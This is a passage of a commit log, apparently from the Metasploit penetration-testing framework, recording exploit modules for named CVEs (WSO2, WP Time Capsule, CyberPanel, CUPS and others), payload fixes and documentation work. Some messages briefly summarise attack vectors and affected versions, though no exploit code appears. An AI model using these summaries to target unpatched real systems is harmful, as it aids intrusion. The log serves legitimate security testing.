Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-12-17 17:26:31 +00:00
Stephen Fewer
65bb3cc990
typo 2
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-12-17 17:26:20 +00:00
Stephen Fewer
3ed2b5916a
fix typo
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-12-17 17:26:00 +00:00
aaryan-11-x
f2d723d1d0
Modified the code logic as instructed by the reviewer & removed the instance variable
2024-12-17 21:39:30 +05:30
sjanusz-r7
a99fae420a
Capitalize TeamCity correctly
2024-12-17 14:27:41 +00:00
dledda-r7
5005d73a3e
fix: removing reverse_hop_http spec test
2024-12-17 08:55:10 -05:00
dledda-r7
60f26f7062
fix: removing reverse_hop_http
2024-12-17 08:53:06 -05:00
dledda-r7
31dc885419
fix: removing reverse_https_proxy spec test
2024-12-17 06:46:32 -05:00
aaryan-11-x
f5329a71df
Added the DELETE_FILES option to delete leftover files by the exploit with the FileDropper mixin
2024-12-17 17:00:06 +05:30
aaryan-11-x
4c51165ec6
Made necessary changes as mentioned by the reviewer
2024-12-17 16:07:58 +05:30
dledda-r7
b2ab69ea51
fix: removing reverse_https_proxy payload
2024-12-17 05:03:36 -05:00
Martin Sutovsky
4a13b09767
Land #19719 , Fix bug in fetch payload when FETCH_DELETE set to true
2024-12-17 08:42:47 +01:00
jenkins-metasploit
703ed44357
automatic module_metadata_base.json update
2024-12-16 18:46:51 +00:00
adfoster-r7
065cee8698
Merge pull request #19739 from sjanusz-r7/add-ignorelist-to-local-exploit-suggester-datastore-options
...
Add ignorelist to local exploit suggester datastore options
2024-12-16 18:40:41 +00:00
sjanusz-r7
70d5430ba8
Add ignorelist to local exploit suggester datastore options
2024-12-16 17:51:38 +00:00
h00die-gr3y
09ceb48705
init commit module
2024-12-16 16:22:53 +00:00
jenkins-metasploit
92c97b002a
automatic module_metadata_base.json update
2024-12-16 15:34:14 +00:00
jheysel-r7
6f9982db54
Land #19647 Added module for WSO2 API Manager RCE
...
Adds an exploit module for a vulnerability in the 'Add API Documentation' feature of WSO2 API Manager and allows malicious users with specific permissions to upload arbitrary files to a user-controlled server location. This flaw allows for RCE on the target system.
2024-12-16 07:27:23 -08:00
jenkins-metasploit
88347ad2d4
automatic module_metadata_base.json update
2024-12-16 12:13:37 +00:00
Diego Ledda
7878d9fd3b
Land #19735 , Update the CachedSize for reverse_http and reverse_http payloads
...
Land #19735 , Update the CachedSize for reverse_http and reverse_http payloads
2024-12-16 13:07:13 +01:00
Christophe De La Fuente
b33b01e0d8
Update the CachedSize for reverse_http and reverse_http payloads
2024-12-16 12:48:57 +01:00
adfoster-r7
0068857d78
Merge pull request #19718 from sjanusz-r7/add-rpc-token
...
Keep track of RPC token per-thread
2024-12-16 11:08:22 +00:00
h00die
af462f7dcf
arch linux compatibility for runc priv esc
2024-12-16 05:52:29 -05:00
aaryan-11-x
d196591845
Modified documentation
2024-12-16 15:47:30 +05:30
aaryan-11-x
06528abe05
Added documentation
2024-12-16 15:33:29 +05:30
aaryan-11-x
eb5385a23d
msftidy & Rubocop Fixes
2024-12-16 14:45:04 +05:30
Martin Sutovsky
ebf73798a8
Landing #19726 , fixed incorrect processing of HTTP User Agent parameter in x64 reverse HTTP payload (Windows)
2024-12-16 10:11:32 +01:00
Ashley Donaldson
40f2eaaab1
Recognise broken SMB sessions and close them
2024-12-16 19:52:19 +11:00
aaryan-11-x
08519defc7
RuboCop Fixes
2024-12-16 11:36:23 +05:30
RageLtMan
df6bd846e5
Add . prefix tip to shell command help
2024-12-15 18:28:18 -05:00
RageLtMan
54bec338c3
Fix overlap of shell built-in commands with host's
...
When a shell session is established against a system which offers
limited shells, its very common to run into something like "help"
being a native command in the target. MSF now intercepts those as
built-ins and presents the MSF shell help instead of letting the
user see the relevant output from the target.
Implement a fix by allowing the user to prepend built-ins with '.'
to pass-through execution of the intended command (such as '.help'
being executed as 'help') to the target.
Testing:
Local testing with racadm SSH shell - works as intended
2024-12-15 18:06:33 -05:00
h00die
77d0292be3
additional review for obsidian plugin
2024-12-14 17:38:29 -05:00
pczinser
8af31e6b01
updated the inline asm to use User Agent
2024-12-14 15:39:16 -05:00
bwatters-r7
0334109994
Streamline command
2024-12-13 16:43:17 -06:00
jenkins-metasploit
50b12596a6
automatic module_metadata_base.json update
2024-12-13 19:54:06 +00:00
msutovsky-r7
ab55286e0b
Land #19721 , Fix version in CVE-2020-0668 module
...
Fix version check for cve-2020-0668 Service Tracing
2024-12-13 20:47:17 +01:00
bwatters-r7
594946db47
Add sleep to prevent race condition, remove unneeded spaces
2024-12-13 10:31:10 -06:00
cgranleese-r7
985444e5af
Land #19715 , Update README.md
2024-12-13 16:21:38 +00:00
cgranleese-r7
051a46a781
Implements feedback
2024-12-13 16:10:01 +00:00
cgranleese-r7
2edbc6a134
Land #19546 , Improve database module cache performance
2024-12-13 15:31:08 +00:00
cgranleese-r7
90066b3b45
Land #19660 , Make enum options case normalizing
2024-12-13 12:00:43 +00:00
jenkins-metasploit
852bb8bfe2
automatic module_metadata_base.json update
2024-12-13 02:25:39 +00:00
jheysel-r7
afd3d0b66c
Land #19713 , Add exploit module for WP Time Capsule RCE
...
This exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.
2024-12-12 18:19:09 -08:00
jheysel-r7
add7c7b177
Remove potential NoMethodError in fail_with call
2024-12-12 18:04:10 -08:00
bwatters-r7
48ed31f323
Fix version check
2024-12-12 17:11:53 -06:00
Chocapikk
e06dd6deea
Update documentation
2024-12-12 22:10:11 +01:00
Valentin Lobstein
9c8db05dc6
Update modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-12-12 22:06:04 +01:00
Diana Payton
25dcd93d0a
Update db/README.md
...
Co-authored-by: Arne De Herdt <arne_deherdt@rapid7.com >
2024-12-12 10:53:57 -08:00
cgranleese-r7
6ed734e52b
Land #19720 , Update docs dependencies
2024-12-12 17:17:50 +00:00
adfoster-r7
a1ce949b50
Update docs dependencies
2024-12-12 16:19:33 +00:00
bwatters-r7
2faa33ed8e
Fix bug in the way we are executing fetch payload when FETCH_DLETE is set to true
2024-12-12 09:08:52 -06:00
sjanusz-r7
686a463a87
Keep track of RPC token per-thread
2024-12-12 12:57:20 +00:00
Metasploit
2355ab546d
Bump version of framework to 6.4.41
2024-12-12 03:32:50 -06:00
jenkins-metasploit
5f4fbf1931
automatic module_metadata_base.json update
2024-12-12 01:06:56 +00:00
jheysel-r7
c7f7cfd848
Land #19656 Close ssh session on error
2024-12-11 17:00:17 -08:00
adfoster-r7
31930f47dd
Merge pull request #19700 from jheysel-r7/fix_send_request_cgi_bang
...
Fix query param in reconfig_redirect_opts!
2024-12-11 23:30:51 +00:00
h00die
7cf942ca30
peer review
2024-12-11 17:49:43 -05:00
Spencer McIntyre
c3cf56f06f
Merge pull request #19710 from szymonj99/set-prompitng-false
...
Set readline output to non-prompting on method exit
2024-12-11 15:22:42 -05:00
dwelch-r7
a63fa6843e
Land #19716 Revert "Use existing input object when calling init_tab_complete"
2024-12-11 16:23:53 +00:00
Simon Janusz
6167596c20
Revert "Use existing input object when calling init_tab_complete"
2024-12-11 16:22:18 +00:00
dwelch-r7
65612d6757
Land #19711 , Use existing input object when calling init_tab_complete
2024-12-11 15:48:09 +00:00
Diana Payton
dd92e54512
Update README.md
...
Minor edits to improve the README, added some important information from schema.rb comments.
2024-12-11 07:10:04 -08:00
jenkins-metasploit
e7b04abf81
automatic module_metadata_base.json update
2024-12-11 14:00:07 +00:00
adfoster-r7
136599a29a
Merge pull request #19714 from bwatters-r7/update/projectsend-cveinfo
...
Add CVE info to projectsend module
2024-12-11 13:54:06 +00:00
bwatters-r7
5311b7014e
Add CVE info to projectsend module
2024-12-11 07:37:43 -06:00
Heyder Andrade
41e7bf8812
Enhance: Rollback to register_file_for_cleanup
...
- Verified that the CWD is the WSO2_SERVER_HOME, allowing the uploaded payload file to be registered for cleanup using register_file_for_cleanup.
- Improved feedback by including the payload filename in the success message.
- Removed redundant on_new_session cleanup logic, as file management is now handled by FileDropper.
2024-12-11 11:58:53 +01:00
Chocapikk
7b918b24c9
Add platform
2024-12-11 02:17:11 +01:00
Chocapikk
7d559e0b34
Add exploit module for CVE-2024-8856 - WP Time Capsule RCE
2024-12-11 01:14:17 +01:00
jenkins-metasploit
9962429b42
automatic module_metadata_base.json update
2024-12-10 16:33:13 +00:00
Spencer McIntyre
f36d786736
Merge pull request #19696 from smashery/add_user_module
...
Add user module
2024-12-10 11:26:49 -05:00
Spencer McIntyre
f05145dd1e
Tweak the documentation verbiage slightly
2024-12-10 10:58:17 -05:00
jenkins-metasploit
828725f54c
automatic module_metadata_base.json update
2024-12-10 14:51:01 +00:00
Diego Ledda
4c0a403b64
Land #19701 , Auxiliary Module for CVE-2021-24762: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
...
Land #19701 , Auxiliary Module for CVE-2021-24762: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
2024-12-10 15:44:50 +01:00
Diego Ledda
095bd946f4
docs: updated docs
2024-12-10 15:35:16 +01:00
Diego Ledda
ccf7e6942a
chore: fix rubocop
2024-12-10 14:48:18 +01:00
Aaryan Golatkar
ef1b38654b
Added perfect-survey to data/wordlists/wp-exploitable-plugins.txt
2024-12-10 18:59:20 +05:30
Aaryan Golatkar
299f3027a8
Added SQLi mixin, Implemented check method & removed SHOW_FULL_RESPONSE option
2024-12-10 18:56:54 +05:30
sjanusz-r7
4293aac54e
Use existing input object when calling init_tab_complete
2024-12-10 10:56:26 +00:00
Aaryan Golatkar
b09d3033f3
Removed store_loot
2024-12-10 10:17:21 +05:30
jenkins-metasploit
eb11cb6372
automatic module_metadata_base.json update
2024-12-09 21:09:54 +00:00
jheysel-r7
0b5e221620
Land #19533 , Update werkzeug rce module
2024-12-09 12:56:35 -08:00
szymonj99
78781be801
Set readline output to non-prompting on method exit
2024-12-09 18:53:54 +00:00
Aaryan Golatkar
db7f05dd76
Made all the changes as requested by the reviewer dledda-r7
2024-12-09 23:44:04 +05:30
Aaryan Golatkar
bd1320f722
Merge branch 'rapid7:master' into wp_perfect_survey_sqli
2024-12-09 23:17:20 +05:30
Diego Ledda
3a2b5ce795
Land #19621 , Remove a test that should be working now
...
Land #19621 , Remove a test that should be working now
2024-12-09 17:16:53 +01:00
jenkins-metasploit
610c8faaf7
automatic module_metadata_base.json update
2024-12-09 14:54:20 +00:00
Spencer McIntyre
d060312167
Merge pull request #19666 from smashery/smb_change_pw
...
Change/Reset passwords over SMB
2024-12-09 09:48:09 -05:00
Spencer McIntyre
8b93f1a087
Merge branch 'master' into smb_change_pw
2024-12-09 09:37:45 -05:00
Ashley Donaldson
63bf59b516
Updated ruby_smb with SMB Change Password structures/functionality
2024-12-09 11:09:30 +11:00
Ashley Donaldson
6eea156899
Added moved_from metadata
2024-12-09 08:49:04 +11:00
Graeme Robinson
4ce4cf472e
Update werkzeug_debug_rce.md
...
Added note about python3 version in verification steps because the version may change when a newer docker image becomes available.
Added report.txt as a file because I apparently forgot it before and the containers fail to build without it.
2024-12-08 21:11:03 +00:00
Graeme Robinson
7838a943ce
Update werkzeug_debug_rce.rb
...
Added comments about where version-dependant salts come from
2024-12-08 21:01:17 +00:00
Heyder Andrade
f3f1c893a1
Added cleanup method
2024-12-08 02:12:16 +01:00
Heyder Andrade
c953601335
Fix: it needs at least 2 follows redirect
2024-12-08 00:13:12 +01:00
Heyder Andrade
edb9fdc682
Merge
2024-12-08 00:10:35 +01:00
jenkins-metasploit
b31d3e3627
automatic module_metadata_base.json update
2024-12-07 14:30:59 +00:00
adfoster-r7
2421ca768f
Merge pull request #19705 from ostrichgolf/projectsend_rce
...
Add CVE to ProjectSend module
2024-12-07 14:24:20 +00:00
ostrichgolf
2952dbb0b8
Add CVE to module
2024-12-07 14:23:30 +01:00
jenkins-metasploit
3c9d698103
automatic module_metadata_base.json update
2024-12-07 03:07:19 +00:00
adfoster-r7
861859196a
Merge pull request #19703 from zeroSteiner/fix/mod/dns_txt_exec-docs
...
Clarify documentation in dns_txt_query_exec
2024-12-07 03:00:30 +00:00
jenkins-metasploit
2bd4f11ec5
automatic module_metadata_base.json update
2024-12-07 00:35:11 +00:00
jheysel-r7
0e5cf3f7ba
Land #19649 , Primefaces RCE (CVE-2017-1000486)
2024-12-06 16:22:06 -08:00
jheysel-r7
6cfc18a1e7
Land #19661 , WordPress Really Simple Security Plugin RCE (CVE-2024-10924)
2024-12-06 16:19:56 -08:00
jheysel-r7
2357c8ad55
Standardize capitalization of Java Expression Language
2024-12-06 16:00:58 -08:00
jenkins-metasploit
0d92346917
automatic module_metadata_base.json update
2024-12-06 22:21:41 +00:00
Spencer McIntyre
909476ee64
Merge pull request #19671 from smashery/ldap_change_pw
...
LDAP Change Password module
2024-12-06 17:13:50 -05:00
Chocapikk
8f274f0189
Remove complexity
2024-12-06 22:48:59 +01:00
Spencer McIntyre
a708f8c7f3
Fix a trivial typo
2024-12-06 16:47:25 -05:00
h00die
6911e52d55
peer review
2024-12-06 15:39:19 -05:00
h00die
e33200100d
peer review
2024-12-06 15:34:40 -05:00
Spencer McIntyre
1d3d3419f6
Clarify documentation in dns_txt_query_exec
2024-12-06 14:26:44 -05:00
jenkins-metasploit
b4762b722c
automatic module_metadata_base.json update
2024-12-06 17:49:42 +00:00
Spencer McIntyre
7006c8fcfc
Merge pull request #19609 from dledda-r7/remove-hardcoded-blockapi-hash
...
Remove hardcoded blockapi hashes
2024-12-06 12:43:03 -05:00
Spencer McIntyre
83fcc32780
Update metasploit-payloads gem to 2.0.189
...
Includes changes from:
* rapid7/metasploit-payloads#731
* rapid7/metasploit-payloads#730
2024-12-06 12:31:11 -05:00
Spencer McIntyre
7994c16141
Revert "Update the acceptance testing definition for now"
...
This reverts commit 1ef34d7d8f12d5588914258f6e4e35ed923afcad.
2024-12-06 12:31:11 -05:00
Spencer McIntyre
7e2df70b14
Update the acceptance testing definition for now
2024-12-06 12:31:11 -05:00
Spencer McIntyre
19302e1c5d
Remove a test that should be working now
2024-12-06 12:31:11 -05:00
Jack Heysel
f720b519c9
Lint
2024-12-06 06:22:03 -08:00
Jack Heysel
7c9bddc6e6
Added use of send_request_cgi!
2024-12-06 06:20:46 -08:00
dledda-r7
6d6608c06c
fix: updated cachedsize reverse_https_proxy
2024-12-06 09:15:36 -05:00
jenkins-metasploit
36505c7cf0
automatic module_metadata_base.json update
2024-12-06 11:21:41 +00:00
Diego Ledda
be30a06af4
Land #19430 , Moodle RCE (CVE-2024-43425) Module
...
Land #19430 , Moodle RCE (CVE-2024-43425) Module
2024-12-06 12:15:35 +01:00
aaryan-11-x
500df59156
Changed plaintext to sh for better looking output
2024-12-06 12:44:50 +05:30
aaryan-11-x
547bc96603
Modified the output in the document
2024-12-06 12:43:20 +05:30
aaryan-11-x
f426dc6c20
msftidy_docs Fixes
2024-12-06 12:02:18 +05:30
aaryan-11-x
897dfcd328
Added documentation of the auxiliary module
2024-12-06 11:57:04 +05:30
aaryan-11-x
a4af59a595
Changed filename from wp_plugin_perfect_survey_sqli.rb to wp_perfect_survey_sqli.rb
2024-12-06 11:45:36 +05:30
aaryan-11-x
3881fd6c3c
RuboCop Fixes
2024-12-06 11:41:25 +05:30
aaryan-11-x
8d81ad125d
Added Notes section in the code & corrected the disclosure date
2024-12-06 11:40:42 +05:30
Ashley Donaldson
75a334ca0a
Changes from code review
2024-12-06 16:05:53 +11:00
Ashley Donaldson
5032695d1f
MSFTidy fixes
2024-12-06 14:36:05 +11:00
Ashley Donaldson
7c46d4d02d
Updated text to be clearer about the AES kerberos behaviour
2024-12-06 14:28:44 +11:00
Ashley Donaldson
88bd8f6f9e
Support SMBPass as NTLM format
2024-12-06 14:21:56 +11:00
Jack Heysel
c7b96f89b0
Unset opts query if no location.query
2024-12-05 18:24:12 -08:00
Jack Heysel
a544805659
Fix query in reconfig_redirect_opts!
2024-12-05 18:18:06 -08:00
h00die
6723c585f2
obsidian plugin module
2024-12-05 17:54:07 -05:00
Ashley Donaldson
d5b2d760e8
Updated ancillary documentation
2024-12-06 07:53:19 +11:00
jenkins-metasploit
22ade4f08f
automatic module_metadata_base.json update
2024-12-05 17:41:42 +00:00
jheysel-r7
8ac7348be0
Land #19608 CyberPanel Pre-Auth RCE
...
Adds a CyberPanel Pre-Auth RCE Exploit Module for (CVE-2024-51378 / CVE-2024-51567 / CVE-2024-51568)
2024-12-05 09:35:35 -08:00
Chocapikk
9de6a898cd
Re-add wordpress detection check
2024-12-05 16:19:15 +01:00
Chocapikk
022533db59
Fix check and use rest_route
2024-12-05 16:19:15 +01:00
Chocapikk
86bc3ceb5e
Handle case when 2FA is disabled
2024-12-05 16:19:15 +01:00
Chocapikk
5290750cca
Update doc
2024-12-05 16:19:14 +01:00
Chocapikk
a123234141
Add CVE-2024-10924
2024-12-05 16:19:09 +01:00
Chocapikk
b8ec13e9dc
Lint
2024-12-05 16:05:25 +01:00
Heyder Andrade
d5f0c6108c
Fix: Ensure api_list returns a list even when created during execution
2024-12-05 14:34:20 +01:00
Metasploit
52ebbc19ca
Bump version of framework to 6.4.40
2024-12-05 03:32:37 -06:00
Valentin Lobstein
ca45c6439f
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-12-05 08:20:59 +01:00
jenkins-metasploit
d439a9ef1a
automatic module_metadata_base.json update
2024-12-05 02:32:04 +00:00
jheysel-r7
e8911f9129
Land #19402 vCenter Sudo LPE (CVE-2024-37081)
2024-12-04 18:25:05 -08:00
h00die
bca3626cf2
peer review
2024-12-04 18:39:43 -05:00
Chocapikk
0fecf5be65
Add Referer header
2024-12-04 20:55:51 +01:00
Spencer McIntyre
2e8d52fd16
Merge pull request #19690 from msutovsky-r7/update_mailmap
...
Added msutovsky-r7 to mail map
2024-12-04 14:43:59 -05:00
Heyder Andrade
964261283b
Fix: Handle full-location redirects in send_request_cgi
...
- Resolved an issue where redirects with full-location URLs were not properly handled by `send_request_cgi`.
- Implemented a quick solution for now; open to suggestions for a more robust approach.
- Tested behavior without proxy interference, as Burp previously masked the issue.
2024-12-04 20:05:07 +01:00
msutovsky-r7
3ba000cbd7
Added msutovsky-r7 to mail map
2024-12-04 17:54:01 +01:00
jenkins-metasploit
7265f093b8
automatic module_metadata_base.json update
2024-12-04 16:32:08 +00:00
jheysel-r7
21cf475cbb
Land #19595 Ivanti Connect Secure auth RCE via OpenSSL (CVE-2024-37404)
2024-12-04 08:26:07 -08:00
jenkins-metasploit
2f5980ba42
automatic module_metadata_base.json update
2024-12-04 15:56:05 +00:00
Jack Heysel
b7f9ae7ec5
Updated module validation spec
2024-12-04 07:55:16 -08:00
Diego Ledda
ab2ca41eb8
Land #19629 , Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220)
...
Land #19629 , Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220)
2024-12-04 16:49:56 +01:00
jenkins-metasploit
a814d77199
automatic module_metadata_base.json update
2024-12-04 15:45:43 +00:00
Heyder Andrade
fabced539d
Apply suggestions from code review
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-12-04 16:44:48 +01:00
Diego Ledda
58702f238c
Land #19574 , Windows Access Mode Mismatch LPE in ks.sys (CVE-2024-35230)
...
Land #19574 , Windows Access Mode Mismatch LPE in ks.sys (CVE-2024-35230)
2024-12-04 16:39:43 +01:00
jheysel-r7
fa3716408f
Add comment explaining payload architecture restraints
2024-12-03 18:33:43 -08:00
adfoster-r7
17fdd35608
Merge pull request #19684 from sjanusz-r7/teamcity-improvements
...
TeamCity improvements
2024-12-03 12:25:52 +00:00
jenkins-metasploit
e5cfc08eac
automatic module_metadata_base.json update
2024-12-03 02:39:10 +00:00
jheysel-r7
2d1af7d809
Land #19648 Add exploit module for FortiManager (CVE-2024-47575)
2024-12-02 18:31:25 -08:00
jheysel-r7
5a837d1ef6
fix a typo
2024-12-02 18:16:43 -08:00
sjanusz-r7
76c93f4d33
Log search for TeamCity in body instead of headers
2024-12-02 22:04:56 +00:00
jenkins-metasploit
1f32f91510
automatic module_metadata_base.json update
2024-12-02 18:44:47 +00:00
Spencer McIntyre
d22c6996be
Merge pull request #18877 from h00die/xspy
...
New module to replicate xspy tool (and X11 library)
2024-12-02 13:38:37 -05:00
jenkins-metasploit
891b89d697
automatic module_metadata_base.json update
2024-12-02 16:27:49 +00:00
jheysel-r7
a230a353e4
Land #19613 Asterisk authenticated rce via AMI (CVE-2024-42365)
2024-12-02 08:21:35 -08:00
Christophe De La Fuente
a46b2f437f
Use TARGET_URI when checking the redirection URI
2024-12-02 16:45:12 +01:00
Christophe De La Fuente
3dcb9d58ab
Code review
2024-12-02 14:02:07 +01:00
Christophe De La Fuente
c943cc6378
Add module and documentation
2024-12-02 14:02:07 +01:00
Ashley Donaldson
b5fbc9a8ae
MSFTidy fixes
2024-12-02 12:35:00 +11:00
Chocapikk
eaf277e418
Lint
2024-11-30 14:24:33 +01:00
Valentin Lobstein
a7e17d09c9
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-11-30 13:55:16 +01:00
Valentin Lobstein
6adf17f5f7
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-11-30 13:55:09 +01:00
Valentin Lobstein
5cdf7ae175
Update documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-11-30 13:55:02 +01:00
jheysel-r7
1c326d6594
Land #19622 , update windows install docs
...
Update Windows Installation instruction in Setting-Up-a-Metasploit-Development-Environment.md
2024-11-29 12:52:00 -08:00
jenkins-metasploit
5999a2622b
automatic module_metadata_base.json update
2024-11-29 17:14:25 +00:00
jheysel-r7
c4b7954f15
Land #19596 , Wordpress Plugin Post SMTP Account Takeover
2024-11-29 09:05:03 -08:00
sjanusz-r7
e827cccd48
Improve TeamCity Login Scanner
2024-11-29 16:52:00 +00:00
dledda-r7
3167a6c73c
fix(payloads): re-wrote reverse_https_proxy stager
2024-11-29 07:57:51 -05:00
dledda-r7
4468d3bc79
fix(payloads): removing hardcoded block-api hash from reverse_tcp_dns
2024-11-29 07:55:49 -05:00
h00die
d13bccca05
peer review
2024-11-28 20:24:25 -05:00
h00die
1906646e67
peer review
2024-11-28 13:18:47 -05:00
jenkins-metasploit
f2e5dd61fa
automatic module_metadata_base.json update
2024-11-28 17:27:49 +00:00
jheysel-r7
caa483a24a
Land #19583 Acronis Cyber Backup/Protect RCE [CVE-2022-3405]
2024-11-28 09:18:19 -08:00
jheysel-r7
65acafacfd
Apply suggestions from code review
2024-11-28 08:57:21 -08:00
dledda-r7
4d19535ca0
fix(payloads): removing hardcoded block-api asm and hashes from x86 messagebox module
2024-11-28 06:41:32 -05:00
Metasploit
6ca45601fb
Bump version of framework to 6.4.39
2024-11-28 03:32:30 -06:00
h00die-gr3y
2115c81654
update using acronis_cyber mixin
2024-11-27 22:21:27 +00:00
h00die-gr3y
a945a54fc3
Merge remote-tracking branch 'origin/master' into acronis-rce
2024-11-27 21:50:53 +00:00
h00die
e0a39b5d6b
Merge pull request #26 from smcintyre-r7/pr/collab/18877
...
Refactor some X11 code around
2024-11-27 16:33:04 -05:00
h00die-gr3y
3a2aa0f31c
module prep to use acronis_cyber mixin
2024-11-27 21:31:40 +00:00
h00die
e41f5ad577
needrestart exploit updates
2024-11-27 15:41:23 -05:00
Spencer McIntyre
cd4899da00
Refactor some X11 code around
...
Consistently refer to replys as responses
2024-11-27 15:19:26 -05:00
jenkins-metasploit
07ce1aae77
automatic module_metadata_base.json update
2024-11-27 15:56:37 +00:00
jheysel-r7
7de3d117b8
Land #19582 Acronis Cyber Backup/Protect Info Disclosure
2024-11-27 07:50:16 -08:00
dledda-r7
acb022c18f
fix(payloads): update cachedsize for x64 messagebox module
2024-11-27 08:15:57 -05:00
dledda-r7
46292b8b9a
fix(payloads): removing hardcoded block-api asm and hashes from x64 messagebox module
2024-11-27 08:08:31 -05:00
h00die
d778f5469b
needrestart improvements
2024-11-26 18:22:48 -05:00
dledda-r7
eb58072034
fix(payloads): update cachedsize
2024-11-26 12:07:32 -05:00
dledda-r7
9bfb67444d
fix(payloads): fixing typo on block-api hashing function
2024-11-26 12:07:31 -05:00
dledda-r7
00707a8a11
fix(payloads): removing hardcoded block-api asm and hashes from PrependMigrate mixin
2024-11-26 12:07:31 -05:00
dledda-r7
55515441d2
fix(payloads): update cachedsize reverse_hop_http
2024-11-26 12:07:30 -05:00
dledda-r7
37bb14ba9c
fix(payloads): removing hardcoded block-api hashes
2024-11-26 12:07:30 -05:00
dledda-r7
e7c23e4a65
fix(payloads): removing hardcoded block-api hashes
2024-11-26 12:07:30 -05:00
dledda-r7
3fe1ffb6f3
fix(payloads): removing hardcoded block-api hashes
2024-11-26 12:07:29 -05:00
h00die-gr3y
18c4e9c2f6
moved get_machine_info to the acronis_cyber mixin
2024-11-26 16:10:14 +00:00
h00die-gr3y
b6595eeaf0
added acronis cyber mixin
2024-11-26 15:49:57 +00:00
jenkins-metasploit
de5e94d81f
automatic module_metadata_base.json update
2024-11-26 14:11:40 +00:00
Spencer McIntyre
6c76dcb20c
Merge pull request #19651 from smashery/smb_version_update
...
Give likely Windows versions for SMB v2-3
2024-11-26 09:05:10 -05:00
Heyder Andrade
c1c74a0959
Do not fail on document creation
...
Since we attempt to create the document in multiple APIs, we want to avoid exiting on a failed creation attempt. This will allow us to retry the document creation on the next available API.
2024-11-26 11:56:50 +01:00
h00die
19394960cd
needrestart improvements
2024-11-25 16:40:00 -05:00
h00die
d4bd00d48e
needrestart improvements
2024-11-25 16:38:18 -05:00
sjanusz-r7
566e12b69e
Add error_callback to SSH Command Stream
2024-11-25 16:43:59 +00:00
Spencer McIntyre
530dbd6da1
Merge pull request #19678 from smashery/pre2k-ldap-query
...
Added LDAP query searching for likely Pre-Windows-2000 computers
2024-11-25 10:18:49 -05:00
Ashley Donaldson
7f6bdb385d
Added LDAP query searching for likely Pre-Windows-2000 computers
2024-11-25 12:30:27 +11:00
h00die
492ccca1aa
review
2024-11-23 12:43:35 -05:00
Heyder Andrade
dc445ed1ac
Apply suggestions from code review
2024-11-23 00:57:08 +01:00
h00die
7fd82b89df
offload files to data
2024-11-22 15:57:18 -05:00
h00die
7025871d34
ubuntu needrestart lpe
2024-11-22 15:44:52 -05:00
h00die
94e5e49052
ubuntu needrestart lpe
2024-11-22 15:44:45 -05:00
Heyder Andrade
e772c7adaa
Apply suggestions from code review
...
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com >
2024-11-22 16:56:50 +01:00
jenkins-metasploit
d5b71aa581
automatic module_metadata_base.json update
2024-11-22 14:28:34 +00:00
Spencer McIntyre
502e415344
Merge pull request #19630 from remmons-r7/cups_ipp_rce
...
Exploit module for IPP attributes remote code execution - OpenPrinting CUPS
2024-11-22 09:22:21 -05:00
sfewer-r7
68e9b39ffa
register teh Rex socket we create via add_socket. This lets teh frameowkr close the socket after we get a session, and will wait up to WfsDelay for that to happen. This lets us remove the other timeout we had, and teh user can always adjust WfsDelay if needed. (Thanks Spencer)
2024-11-22 12:42:08 +00:00
sfewer-r7
e5cdf6097d
favor File.binread over File.read
2024-11-22 12:40:19 +00:00
sfewer-r7
f59bfe98a3
remove the default payload and the default fetch command, and let the framework choose them for us.
2024-11-22 12:39:34 +00:00
sfewer-r7
2ba112a5a4
We can use OptPath here instead of OptString. Also are these are optional, and we dont specify a default, we can omit the nil default value.
2024-11-22 12:38:46 +00:00
sfewer-r7
000ffb2406
make the check routine return a message for Detected.
2024-11-22 12:37:50 +00:00
sfewer-r7
de599a4407
rework how we calculate the chunk size, we now consume the maximum available space a chunk can take, relative to the size of teh command needed to write the chunk to disk. We also rework the logic to ensure the files are sequential. Finally as the size of a chunk may be less the more chunks we write, we impose a max Payload Space valuecalculated to be 5670 chars.
2024-11-22 10:28:27 +00:00
sfewer-r7
eda46f1a10
the check routing shoudl return Safe the first time we try to leverage teh vulnerability, if that doesnt work. But still return Unknown if the vulnerability fails the second time we leverage it.
2024-11-22 10:26:06 +00:00
dwelch-r7
d3b7683532
Land #19672 , Added mwalas-r7 to the mail map
2024-11-22 10:06:39 +00:00
Marcin Walas
4d25cd90c6
Added mwalas-r7 to the mail map
2024-11-22 10:25:53 +01:00
Ashley Donaldson
ae61d0a9d6
MSFTidy changes
2024-11-22 13:39:07 +11:00
Ashley Donaldson
cd780e4339
Added documentation
2024-11-22 13:12:38 +11:00
Ashley Donaldson
6f4ab97c83
Commenting changes
2024-11-22 13:06:58 +11:00
Valentin Lobstein
2af0f506c2
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
2024-11-22 02:01:12 +01:00
Chocapikk
c5ce193fd5
Remove dup line
2024-11-21 23:10:18 +01:00
Chocapikk
9c74467950
Refactor code + add check and autocheck
2024-11-21 22:48:36 +01:00
remmons-r7
74cfde39f0
Merge pull request #2 from smcintyre-r7/pr/collab/19630
...
Cups Exploit Updates
2024-11-21 14:28:40 -06:00
Spencer McIntyre
0ec9b1bcb9
Fix a multicast socket issue
2024-11-21 15:14:46 -05:00
Spencer McIntyre
